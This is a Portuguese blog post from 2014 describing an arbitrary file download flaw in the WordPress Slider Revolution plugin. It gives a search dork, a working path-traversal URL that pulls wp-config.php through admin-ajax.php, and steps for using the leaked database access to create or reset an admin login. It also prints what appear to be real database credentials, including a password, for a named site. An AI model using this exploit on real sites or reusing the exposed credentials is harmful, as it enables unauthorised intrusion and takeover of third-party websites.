segunda-feira, 4 de agosto de 2014

Wordpress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download

Wordpress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download


0x Wordpress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download


Slider Revolution Responsive é um plugin do wordpress muito utilizado hoje em dia por sites que abortam diversos temas variando de sites governamentais ate mesmo sites de lojas uma falha que aos olhos de muitos poderia ser algo banal acabou virando uma grande dor de cabeça.
O bug permite a download do arquivo wp-config entre outros, no wp-config contem

  1. define('DB_NAME', 'lojaphos'); Nome do banco de dados
  2. define('DB_USER', 'lojaphos'); Usuário relativo ao banco que contem o Wordpress
  3. define('DB_PASSWORD', 'silva2805'); Senha do banco
  4. define('DB_HOST', 'mysql.phosloja.com.br'); normalmente estará como localhost
 0x Explorando 

            Dork revslider.php "index of"
            http://site.alvo/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


Apos obter essas informações conseguimos reseta/inserir um novo usuário e uma nova senha no banco de dados e efetuar o login com sucesso.
Apos obter essas informações conseguimos reseta/inserir um novo usuário e uma nova senha no banco de dados e efetuar o login com sucesso.

 No vídeo abaixo demostra a exploração com o inurlbr
                                                                   

Nenhum comentário:

Postar um comentário

............